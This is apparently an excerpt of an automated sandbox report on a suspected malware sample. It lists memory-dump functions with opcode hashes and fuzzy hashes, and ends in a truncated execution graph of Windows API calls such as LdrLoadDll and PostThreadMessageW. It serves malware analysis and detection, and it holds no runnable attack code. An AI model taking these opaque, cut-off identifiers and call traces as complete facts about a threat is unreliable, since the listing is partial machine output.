                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 465c4d01bc242b819ab0bd3384924c48318736a17213a741041f613336a57f19
                      • Instruction ID: 2eb6ff81797acc7610cfb4182fc149f6844823e8bc38fe1ad6a5d7762e30d639
                      • Opcode Fuzzy Hash: 465c4d01bc242b819ab0bd3384924c48318736a17213a741041f613336a57f19
                      • Instruction Fuzzy Hash: BDE0863270065857E61497AB9C00B27BBDFEFC9B20B14C069A51993344CD607C0186D4
                      Function 072FFAF0 Relevance: .0, Instructions: 23COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9042e5e0c9eb126f0d889846493eb207b56724017c069978c0de9682c4be031b
                      • Instruction ID: 3cf33dee2b9422be576ffe8206f2eeb5c683ead354e6d5396fb0afd1c03e24f0
                      • Opcode Fuzzy Hash: 9042e5e0c9eb126f0d889846493eb207b56724017c069978c0de9682c4be031b
                      • Instruction Fuzzy Hash: CDF01574E0020CAFCF44EFA8D80469DBBB5EB48300F1081AAE904A3350D7345A50DF41
                      Function 072F4190 Relevance: .0, Instructions: 21COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6ff401fa084358df51f647bf2204918922e9ebe69862afc48f08d66d2bb6e642
                      • Instruction ID: a0d7f7fb564ebdbdf344e8420d494686c98c8c6bc422d441a22d0336d91618cd
                      • Opcode Fuzzy Hash: 6ff401fa084358df51f647bf2204918922e9ebe69862afc48f08d66d2bb6e642
                      • Instruction Fuzzy Hash: 96E0CD717505144F8384FBB9E444A0677FAEF8C520310C465F909C7355DE30DC018BD0
                      Function 072F50CE Relevance: .0, Instructions: 18COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2a1cd2e30549bb11e40c6dd6c7768d28dd1d7e90e7e28832a1a220d0dbb592ae
                      • Instruction ID: 66fcc7bed0f3e95b3b0694aba77be64b7b4cb528c1b9e7bff2bdd4c333efbd37
                      • Opcode Fuzzy Hash: 2a1cd2e30549bb11e40c6dd6c7768d28dd1d7e90e7e28832a1a220d0dbb592ae
                      • Instruction Fuzzy Hash: BFD05EB1E380089FC7009AA5E8448EDFB70E78F212F005436D212E3110E3701424CA88
                      Function 072FA903 Relevance: .0, Instructions: 13COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5533d686a340eea8b50329cf10e2e8c7d6e5ee14b46a52c5710d5a8e22a80cd7
                      • Instruction ID: 3b6ab4b373bdbe5e45aaaef1bb0533f1cf2bfd4253764c8a4ddd6aad4e6f611a
                      • Opcode Fuzzy Hash: 5533d686a340eea8b50329cf10e2e8c7d6e5ee14b46a52c5710d5a8e22a80cd7
                      • Instruction Fuzzy Hash: 38D012710643888FC7114BB0F99E12E7F31AA57216B24AD9AE898C6071CA2145438740
                      Function 072F0B8A Relevance: .0, Instructions: 12COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 78aa99ba6a30d9ca3aef53607dcab94516584eed90c3cd8f032e51c84e5aa94f
                      • Instruction ID: d03181eb05805d492707c7f39f69073e916b013113e2c53f43613d39f81a4037
                      • Opcode Fuzzy Hash: 78aa99ba6a30d9ca3aef53607dcab94516584eed90c3cd8f032e51c84e5aa94f
                      • Instruction Fuzzy Hash: 42D0177286021D8FCF46DBA8CA8246EFB36BF89200B549916A0017B655CAB1EA119F85
                      Function 072FA908 Relevance: .0, Instructions: 10COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e61cf71f336e3c761bf494c67946bc0ebef4d254b08a65bc199c1f11e05c9977
                      • Instruction ID: dac869e6acde9b917250aaa5300d8e7bdacbf635f7f23309c9608112268e9df0
                      • Opcode Fuzzy Hash: e61cf71f336e3c761bf494c67946bc0ebef4d254b08a65bc199c1f11e05c9977
                      • Instruction Fuzzy Hash: CFC08CB00746088FE61427A8A80D32CBB79A70220AF042A31E50C01020CF700050C755
                      Function 072F68D0 Relevance: .0, Instructions: 10COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: af3d79aa5bb0b3ef02dbeca100e747435b77619ceae2456f63182c2060e798a2
                      • Instruction ID: 73069e8597e8c5c01517dbb2c062f0a571d182b9d9b709589323899570a538e6
                      • Opcode Fuzzy Hash: af3d79aa5bb0b3ef02dbeca100e747435b77619ceae2456f63182c2060e798a2
                      • Instruction Fuzzy Hash: E5C08C7B1100428FE3076B04C802F00B965FF90308F08C0A4E050CA022CA26C032AB01
                      Function 072F5470 Relevance: .0, Instructions: 9COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b54a7bd114b6f55b964fea7dfd53e2b05383bbc1f5e42e52ebb8df6a0fb1b9fa
                      • Instruction ID: ca813c2b4c61e5c71b8b615d46a926013b4fcb887c4cefb6360cc85cdf0244ce
                      • Opcode Fuzzy Hash: b54a7bd114b6f55b964fea7dfd53e2b05383bbc1f5e42e52ebb8df6a0fb1b9fa
                      • Instruction Fuzzy Hash: 9DD0E974D28209CFCB40DF95D5555ADB7B5AB49301F205415D51562240C77469528F40
                      Function 072F728C Relevance: .0, Instructions: 8COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cfa81556545efa69b2f1b7908ca9248e6c68fafc2a68db233d2e14fae5383c4a
                      • Instruction ID: 5a7df10b2dcd0e4756913e5e0229cb3e42e7661c9b7ec8486dd9f8adfca1875e
                      • Opcode Fuzzy Hash: cfa81556545efa69b2f1b7908ca9248e6c68fafc2a68db233d2e14fae5383c4a
                      • Instruction Fuzzy Hash: DAB012B52B4704E7900123744CD0A2FF650EBB7701FC0AD26B70700180C4714424921F
                      Function 072F0DA9 Relevance: .0, Instructions: 7COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8f4163fdb1746fc67509ceaee25dd6a2024784c55f947696b6f07e43ea3ab8e0
                      • Instruction ID: 7ab1f3f2d375b1740af6f4562239dd9554efa8741d992f637650720fd787f2f8
                      • Opcode Fuzzy Hash: 8f4163fdb1746fc67509ceaee25dd6a2024784c55f947696b6f07e43ea3ab8e0
                      • Instruction Fuzzy Hash: 6EC08C70220200DFCB11CB90C24446ABBB3FF082167200428E00212210C731FC01CF00
                      Function 072F2C34 Relevance: .0, Instructions: 7COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2544edaf4f2f13352831bbc62fcad8a09b4e510ab5fed177d6c482b52cf58c2c
                      • Instruction ID: 7443230f6820655a5f67e2119699d32dfb17c62aeabe521f5598eb119a055aa4
                      • Opcode Fuzzy Hash: 2544edaf4f2f13352831bbc62fcad8a09b4e510ab5fed177d6c482b52cf58c2c
                      • Instruction Fuzzy Hash: BAC09B71D34128D7C384E7B4D940C5CF3E1BA457007404A3A4105560A6C6606D195745
                      Function 072F4AD1 Relevance: .0, Instructions: 7COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a9b51129acca0bf151fc8b14fab82d2c70bdabb9f78e124ca289e73eddf542f3
                      • Instruction ID: 912f9d5a70595f834ba75307af94339adebfab2bf9a8f3fca42da4746e3baca6
                      • Opcode Fuzzy Hash: a9b51129acca0bf151fc8b14fab82d2c70bdabb9f78e124ca289e73eddf542f3
                      • Instruction Fuzzy Hash: 57A011ABC002A202CA802008CEE23880AB0A3A0220FC82080C0808A2A2F03882082222

                      Non-executed Functions

                      Function 072F2450 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: ax^
                      • API String ID: 0-994873808
                      • Opcode ID: f54c130d89ca771e2a5449474f601e0802baeef0bb13f7fc94c35e37c41460cf
                      • Instruction ID: c3eb5defefe8be3520392248469b073c6adcdbb2bfbec467ea17468305194bb8
                      • Opcode Fuzzy Hash: f54c130d89ca771e2a5449474f601e0802baeef0bb13f7fc94c35e37c41460cf
                      • Instruction Fuzzy Hash: C3418FB5F3424ACFCB44DF99C8959AEFBF5BB8A200F058036D605EB351D2B4D9018B96
                      Function 072F2460 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID: ax^
                      • API String ID: 0-994873808
                      • Opcode ID: 5139c8dfdec6c58265b353644f6471722cba30b3800a71745e0775ce51d0d1b5
                      • Instruction ID: b5d1a03342fbb6e677b1ef5f6efd116bff76c7bc1b73386d9fec917f34e7b27a
                      • Opcode Fuzzy Hash: 5139c8dfdec6c58265b353644f6471722cba30b3800a71745e0775ce51d0d1b5
                      • Instruction Fuzzy Hash: 2641A2B5F3424ACFCB44DF99C8859AEF7F5BB8A200F158036D605EB350D2B4D9018B96
                      Function 02CD6250 Relevance: .3, Instructions: 337COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2dd06d7931982d413677c6f3ce8e4a631febacfe8e44c7a5a5bfdea5c57e013b
                      • Instruction ID: b4768d9913caabcbfe4b26c9a1f0cf2ab4b3ad588f4ab244536e81f4a284f32a
                      • Opcode Fuzzy Hash: 2dd06d7931982d413677c6f3ce8e4a631febacfe8e44c7a5a5bfdea5c57e013b
                      • Instruction Fuzzy Hash: 82C1A6707006048FDB29DB75D860BAFB7FBAFC9204F64456ED2868B294DB35E902CB51
                      Function 05360040 Relevance: .3, Instructions: 315COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1340906375.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5360000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 72ec1bd448c8efb968f3a39f6d0c22de3ad88cee2991f97b98f51a4bf5320bb1
                      • Instruction ID: cf92bb83ae2ec5b03067cfabfe6bb2bf633360776adfa6d80a703f145dd3408f
                      • Opcode Fuzzy Hash: 72ec1bd448c8efb968f3a39f6d0c22de3ad88cee2991f97b98f51a4bf5320bb1
                      • Instruction Fuzzy Hash: 4D12A1B84217458AE730CF65F95C2893BF1BB8572CB905309D2612F2E9DBBA116BCF44
                      Function 02CD1BA0 Relevance: .3, Instructions: 312COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9bac38ce6640e95429d3091d8a9d1298d6aa6cecdadc3d8b89d645516f7ff4bd
                      • Instruction ID: f36ad0f6a948e9d4e3a22381c2d8bddf682037bf4f510e4528d83f9f987aa472
                      • Opcode Fuzzy Hash: 9bac38ce6640e95429d3091d8a9d1298d6aa6cecdadc3d8b89d645516f7ff4bd
                      • Instruction Fuzzy Hash: 88E11574E002198FDB14DFA9C580AAEFBF2BF89305F24816AD518AB356C771AD41CF60
                      Function 02CD1198 Relevance: .3, Instructions: 312COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c4e841da9d22ad034efa9fa32e668e73f3b1a8a8d78cd66883d2dff94a4a83bf
                      • Instruction ID: 218710276dcd984d90ed03b999681b68551673f710a969d7ca8af78d14a74a18
                      • Opcode Fuzzy Hash: c4e841da9d22ad034efa9fa32e668e73f3b1a8a8d78cd66883d2dff94a4a83bf
                      • Instruction Fuzzy Hash: 7CE11775E002198FDB14DFA9C580AAEFBF2BF89305F248169D518AB356D770AD41CFA0
                      Function 072FF6B8 Relevance: .3, Instructions: 312COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f95f30a0d1885a2e2496546814b22dfe1362e46e647e1212d5caf20ec2726940
                      • Instruction ID: 161288de392c65f0822541c98f1f83a1cd6eb4d5a0081e7ddf0187450be09d46
                      • Opcode Fuzzy Hash: f95f30a0d1885a2e2496546814b22dfe1362e46e647e1212d5caf20ec2726940
                      • Instruction Fuzzy Hash: 07E1F7B5E102198FDB14DFA9C680AAEFBB2FF89305F24816AD514AB355D730AD41CF60
                      Function 02CD7178 Relevance: .3, Instructions: 298COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3b0f5c9da7b85d4f5570a77a9b9324afc1a9e8457c850db5c01312db704865eb
                      • Instruction ID: dc394a0c6573dc968798d6da60778719feb1776b643176f8cc1b0f9f3dfe6b6c
                      • Opcode Fuzzy Hash: 3b0f5c9da7b85d4f5570a77a9b9324afc1a9e8457c850db5c01312db704865eb
                      • Instruction Fuzzy Hash: 1AD1D434A00208CFDB18DF69C598BA9B7F1BF8C305F2580A9E546AB365DB35AD44CF60
                      Function 072F7967 Relevance: .3, Instructions: 270COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1e2d3cb9e29d82c6001f514a0a2cd4f97458e49ef4f20ceb866ffde2f6f46877
                      • Instruction ID: 4ac204b9d1d46b8b74beb7c1c58961162efca3292853394973224658056a4a26
                      • Opcode Fuzzy Hash: 1e2d3cb9e29d82c6001f514a0a2cd4f97458e49ef4f20ceb866ffde2f6f46877
                      • Instruction Fuzzy Hash: 66D10B3191075A8BCB01EBA4D890AD9B771FF95310F51DB9AE10937261FF70AAC4CB91
                      Function 0105D364 Relevance: .3, Instructions: 264COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1328667414.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1050000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: df8bc05167757dd488c789a84c1fa0e84fa1d711bd7e6c26d1d3a56054365171
                      • Instruction ID: f9a3231b0e10b0822e1137bb8af024783ffebc67941aa901f99077fe777dd51d
                      • Opcode Fuzzy Hash: df8bc05167757dd488c789a84c1fa0e84fa1d711bd7e6c26d1d3a56054365171
                      • Instruction Fuzzy Hash: 8BA17E36E0020A8FCF55DFB4C4445DEBBF2FF88300B1585AAE941AB265EB35E916CB40
                      Function 072F7978 Relevance: .3, Instructions: 264COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f15b8bbd4377a1b45e92abc43433153373d9182b6cc4d81504b5bccfaf8d46c9
                      • Instruction ID: d6d8e3ebe6dd8580e19b9b039ed5fd4142a16f584e6e41d280b2957574f33e42
                      • Opcode Fuzzy Hash: f15b8bbd4377a1b45e92abc43433153373d9182b6cc4d81504b5bccfaf8d46c9
                      • Instruction Fuzzy Hash: 4DD10A3192075A8BCB01EBA4D890AD9F7B1FF95310F50DB9AE50937261EF706AC4CB91
                      Function 05360006 Relevance: .2, Instructions: 236COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1340906375.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5360000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a323b6579dded27f7bac97f13622ca44707319b344eb346c0f17d241988c0bc6
                      • Instruction ID: 86d786c250f933a8d031b19508589facb2b126a8555bdc10f122f400fb5a6fd2
                      • Opcode Fuzzy Hash: a323b6579dded27f7bac97f13622ca44707319b344eb346c0f17d241988c0bc6
                      • Instruction Fuzzy Hash: 1DC125B88207458BE721CF25F85C2897BF1BB8532CF504309D2616F2E9DBB9145ACF54
                      Function 02CD1197 Relevance: .1, Instructions: 127COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0d83d54846d3e66ea03285d7b1f17a3c23b5d9bfa7de5246a60017c74c9f84e2
                      • Instruction ID: d3169903757e72cee0fa86963a6930ab74bcaf1f0f6f00b3d1ab684fe44faa62
                      • Opcode Fuzzy Hash: 0d83d54846d3e66ea03285d7b1f17a3c23b5d9bfa7de5246a60017c74c9f84e2
                      • Instruction Fuzzy Hash: 0051FC75E002198FDB18DFA9C5805AEFBF2FF89305F24816AD518AB315D7319A41CFA0
                      Function 072F1918 Relevance: .1, Instructions: 104COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7dcde9ec80474d96989ad4ac5e328d4b0132422bbe5a16a734918e56c60cfc99
                      • Instruction ID: 10b1f60b496fbd60f18ae57cea3f0d55389ba0416c0160851d02c39c7edbc498
                      • Opcode Fuzzy Hash: 7dcde9ec80474d96989ad4ac5e328d4b0132422bbe5a16a734918e56c60cfc99
                      • Instruction Fuzzy Hash: E541C271730609CFC710CA69C485A5AF7F6EF85350F84843AD25ACB664D274EA61CF41
                      Function 072F1912 Relevance: .1, Instructions: 104COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1349326114.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_72f0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 10856a84b09b0a2e047d28f64a5f827203c5959c696ed5781837a8eabecae556
                      • Instruction ID: 01b7e0bf65fa776fc1464c5035ea690a461c9b673de858616c0f7596f02d7817
                      • Opcode Fuzzy Hash: 10856a84b09b0a2e047d28f64a5f827203c5959c696ed5781837a8eabecae556
                      • Instruction Fuzzy Hash: A541C471730609CFC714CB69C885A5AF7F6EF85350F84843AE15ACB660D274E961CF41
                      Function 02CD46DE Relevance: .0, Instructions: 17COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1329657168.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2cd0000_03.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dfc6ea262516d6175dfc46ff50fc01a33ce46ccd59ca6cf3a17bd445c445debd
                      • Instruction ID: f3515736bcbd42168cab5572e4e0487cdc7628329398b9c7e46d3d90aa07ede5
                      • Opcode Fuzzy Hash: dfc6ea262516d6175dfc46ff50fc01a33ce46ccd59ca6cf3a17bd445c445debd
                      • Instruction Fuzzy Hash: 98C04C1ED8E414E58528598A64405FCE7BDD2DB127F817561C30EA258195318125D548

                      Execution Graph

                      Execution Coverage:1.1%
                      Dynamic/Decrypted Code Coverage:4%
                      Signature Coverage:6.7%
                      Total number of Nodes:150
                      Total number of Limit Nodes:14
                      execution_graph 95194 42e813 95195 42e823 95194->95195 95196 42e829 95194->95196 95199 42d813 95196->95199 95198 42e84f 95202 42bb73 95199->95202 95201 42d82e 95201->95198 95203 42bb90 95202->95203 95204 42bba1 RtlAllocateHeap 95203->95204 95204->95201 95205 424a13 95206 424a22 95205->95206 95215 427d53 95206->95215 95208 424a66 95220 42d733 95208->95220 95211 424a3b 95211->95208 95212 424aa1 95211->95212 95214 424aa6 95211->95214 95213 42d733 RtlFreeHeap 95212->95213 95213->95214 95216 427db0 95215->95216 95217 427de7 95216->95217 95223 424723 95216->95223 95217->95211 95219 427dc9 95219->95211 95233 42bbc3 95220->95233 95222 424a73 95224 42472b 95223->95224 95227 42468d 95223->95227 95224->95219 95225 4246fb 95225->95219 95226 4246c7 95229 42b863 NtClose 95226->95229 95227->95225 95227->95226 95228 42b863 NtClose 95227->95228 95232 42d853 RtlAllocateHeap 95227->95232 95228->95227 95230 4246d0 95229->95230 95230->95219 95232->95227 95234 42bbdd 95233->95234 95235 42bbee RtlFreeHeap 95234->95235 95235->95222 95241 42ae93 95242 42aeb0 95241->95242 95245 1772df0 LdrInitializeThunk 95242->95245 95243 42aed8 95245->95243 95174 41b443 95175 41b487 95174->95175 95177 41b4a8 95175->95177 95178 42b863 95175->95178 95179 42b880 95178->95179 95180 42b891 NtClose 95179->95180 95180->95177 95181 4144a3 95182 4144bd 95181->95182 95187 417e63 95182->95187 95184 4144db 95185 414520 95184->95185 95186 41450f PostThreadMessageW 95184->95186 95186->95185 95188 417e87 95187->95188 95189 417ec3 LdrLoadDll 95188->95189 95190 417e8e 95188->95190 95189->95190 95190->95184 95246 41e533 95247 41e559 95246->95247 95254 41e64d 95247->95254 95255 42e943 95247->95255 95249 41e5eb 95250 41e644 95249->95250 95249->95254 95266 42aee3 95249->95266 95250->95254 95261 427fc3 95250->95261 95253 41e6fa 95256 42e8b3 95255->95256 95257 42e910 95256->95257 95258 42d813 RtlAllocateHeap 95256->95258 95257->95249 95259 42e8ed 95258->95259 95260 42d733 RtlFreeHeap 95259->95260 95260->95257 95262 428020 95261->95262 95263 42805b 95262->95263 95270 418e63 95262->95270 95263->95253 95265 42803d 95265->95253 95267 42af00 95266->95267 95277 1772c0a 95267->95277 95268 42af2c 95268->95250 95271 418e3e 95270->95271 95272 418e4b 95271->95272 95274 42bc13 95271->95274 95272->95265 95275 42bc2d 95274->95275 95276 42bc3e ExitProcess 95275->95276 95276->95272 95278 1772c11 95277->95278 95279 1772c1f LdrInitializeThunk 95277->95279 95278->95268 95279->95268 95280 1772b60 LdrInitializeThunk 95191 419068 95192 42b863 NtClose 95191->95192 95193 419072 95192->95193 95281 414c5c 95282 427d53 2 API calls 95281->95282 95283 414c6f 95282->95283 95284 40199e 95285 4019b3 95284->95285 95288 42ecd3 95285->95288 95291 42d323 95288->95291 95292 42d349 95291->95292 95303 4075b3 95292->95303 95294 42d35f 95302 401a28 95294->95302 95306 41b253 95294->95306 95296 42d37e 95297 42bc13 ExitProcess 95296->95297 95300 42d393 95296->95300 95297->95300 95299 42d3a2 95301 42bc13 ExitProcess 95299->95301 95317 427933 95300->95317 95301->95302 95321 416b93 95303->95321 95305 4075c0 95305->95294 95307 41b27f 95306->95307 95334 41b143 95307->95334 95310 41b2c4 95313 41b2e0 95310->95313 95315 42b863 NtClose 95310->95315 95311 41b2ac 95312 41b2b7 95311->95312 95314 42b863 NtClose 95311->95314 95312->95296 95313->95296 95314->95312 95316 41b2d6 95315->95316 95316->95296 95318 42798d 95317->95318 95320 42799a 95318->95320 95345 4189b3 95318->95345 95320->95299 95322 416baa 95321->95322 95324 416bc3 95322->95324 95325 42c2a3 95322->95325 95324->95305 95326 42c2bb 95325->95326 95327 427d53 2 API calls 95326->95327 95329 42c2d6 95327->95329 95328 42c2df 95328->95324 95329->95328 95330 42aee3 LdrInitializeThunk 95329->95330 95331 42c334 95330->95331 95332 42d733 RtlFreeHeap 95331->95332 95333 42c34d 95332->95333 95333->95324 95335 41b15d 95334->95335 95339 41b239 95334->95339 95340 42af83 95335->95340 95338 42b863 NtClose 95338->95339 95339->95310 95339->95311 95341 42afa0 95340->95341 95344 17735c0 LdrInitializeThunk 95341->95344 95342 41b22d 95342->95338 95344->95342 95346 4189dd 95345->95346 95352 418e4b 95346->95352 95353 4145d3 95346->95353 95348 418aea 95349 42d733 RtlFreeHeap 95348->95349 95348->95352 95350 418b02 95349->95350 95351 